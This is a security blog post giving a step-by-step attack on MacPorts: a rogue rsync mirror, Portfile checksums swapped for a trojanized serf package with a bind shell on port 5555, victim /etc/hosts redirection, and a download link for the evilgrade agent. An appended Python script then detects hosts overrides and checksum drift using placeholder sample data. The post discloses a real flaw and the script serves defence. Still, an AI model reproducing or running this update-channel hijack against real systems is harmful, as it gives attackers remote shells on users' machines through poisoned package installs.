The idea of this post is to show the flaws in the package distribution of the MacPorts project for Mac OS X.
MacPorts works as follows:
a) Your local repository is updated from an rsync server.
b) Packages are distributed via HTTP/FTP.
c) Before a new package is installed, it is checked against the MD5/SHA1 checksums stored in the local repository.
Because those checksums arrive over the same unauthenticated rsync channel as the rest of the repository, whoever can redirect that channel controls both the package and the hash it is checked against.
To perform the attack we need to do the following tasks:
1) Prepare the rsync server on the attacker's machine (192.168.10.133) with all the files of rsync.macports.org:
mkdir -p /dev/evilgrade/release/ports
mkdir -p /dev/evilgrade/release/base
# Get the files from rsync.macports.org
/usr/bin/rsync -rtzv --delete-after --exclude=/PortIndex* rsync://rsync.macports.org/release/ports/ /dev/evilgrade/release/ports/
/usr/bin/rsync -rtzv --delete-after --exclude=/PortIndex* rsync://rsync.macports.org/release/base/ /dev/evilgrade/release/base/
2) Configure the file /etc/rsyncd.conf:
max connections = 20
log file = /var/log/rsync.log
timeout = 300
[release]
comment = Stuff
path = /dev/evilgrade/release/
read only = yes
list = yes
uid = nobody
gid = nogroup
# auth users = craig
# secrets file = /etc/rsyncd.secrets
# change for your subnet (rsyncd.conf only accepts comments on their own line)
hosts allow = 192.168.10.0/24
3) Then start the rsync server: /etc/init.d/rsync start
4) In this case we will attack the package serf in the category www. The idea is that when you install this package we create a shell listening on port 5555.
We have to edit the repository file /dev/evilgrade/release/ports/www/serf/Portfile and change the md5 checksum to the hash of our payload/agent, found in /evilgrade/agent/serf-0.7.2.tar.bz2. You could also prepare the repository so that all Portfiles point to the same package with the same md5, so that any installation infects the victim port.
This agent has a line (132) in Makefile.in that leaves a shell listening on port 5555.

5) On the victim machine (192.168.10.42), for this test, add the following line to /etc/hosts, or perform any traffic-forwarding attack:
192.168.10.133 serf.googlecode.com rsync.macports.org
6) Start evilgrade on the attacker machine 192.168.10.133
7) On the victim machine run "sudo port selfupdate" and then "sudo port install serf"

8) We verify that our attacker is receiving the rsync request by reading the file /var/log/rsync.log

Check what happened in evilgrade:

9) Enjoy your shell!

Download the MacPort agent from http://www.infobytesec.com/down/macportsevilgrade.tar.gz and uncompress it in the evilgrade path.
Remember to keep your systems updated! ;)
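As an added defender-side check (this is not part of the original post and not MacPorts code), the following Python script flags the two things the attack above relies on: an /etc/hosts entry that pins rsync.macports.org or serf.googlecode.com to another address (step 5), and a Portfile whose checksums directive no longer matches hash values you pinned independently. It assumes the `checksums <algo> <hex>` Portfile syntax with backslash line continuations; the hosts file, Portfile and hashes below are constructed sample data.

```python
import re

# Distribution hosts named in the post; an /etc/hosts entry pinning any of
# them to another address is the redirection the attack depends on.
WATCHED_HOSTS = {"rsync.macports.org", "serf.googlecode.com"}
HASH_ALGOS = {"md5", "sha1", "rmd160", "sha256"}

def hosts_overrides(hosts_text, watched=WATCHED_HOSTS):
    """Return (ip, hostname) pairs where an /etc/hosts entry pins a watched host."""
    hits = []
    for raw in hosts_text.splitlines():
        fields = raw.split("#", 1)[0].split()   # drop comments, tokenize
        if len(fields) < 2:
            continue
        ip, names = fields[0], fields[1:]
        hits.extend((ip, n) for n in names if n in watched)
    return hits

def parse_checksums(portfile_text):
    """Extract {algo: hex} from a Portfile 'checksums' directive (joins '\\' continuations)."""
    joined = portfile_text.replace("\\\n", " ")
    m = re.search(r"^checksums\s+(.*)$", joined, re.MULTILINE)
    if not m:
        return {}
    toks = m.group(1).split()
    found = {}
    for i, tok in enumerate(toks):
        if tok in HASH_ALGOS and i + 1 < len(toks):
            found[tok] = toks[i + 1].lower()
    return found

def checksum_drift(portfile_text, pinned):
    """Compare declared checksums against independently pinned values.
    Returns [(algo, pinned_hex, declared_hex)]; an empty list means no drift."""
    declared = parse_checksums(portfile_text)
    return [(a, h, declared.get(a)) for a, h in pinned.items() if declared.get(a) != h]

# Constructed sample data (not real MacPorts content).
SAMPLE_HOSTS = """127.0.0.1 localhost
# redirection as in step 5 of the post
192.168.10.133 serf.googlecode.com rsync.macports.org
"""
SAMPLE_PORTFILE = """PortSystem 1.0
name serf
version 0.7.2
checksums md5 0123456789abcdef0123456789abcdef \\
          sha1 0123456789abcdef0123456789abcdef01234567
"""
PINNED = {"md5": "0123456789abcdef0123456789abcdef",
          "sha1": "ffffffffffffffffffffffffffffffffffffffff"}
```

Run `hosts_overrides` against the real /etc/hosts and `checksum_drift` against a freshly synced Portfile with hashes recorded from a trusted copy; any hit means the sync source or the Portfile should not be trusted.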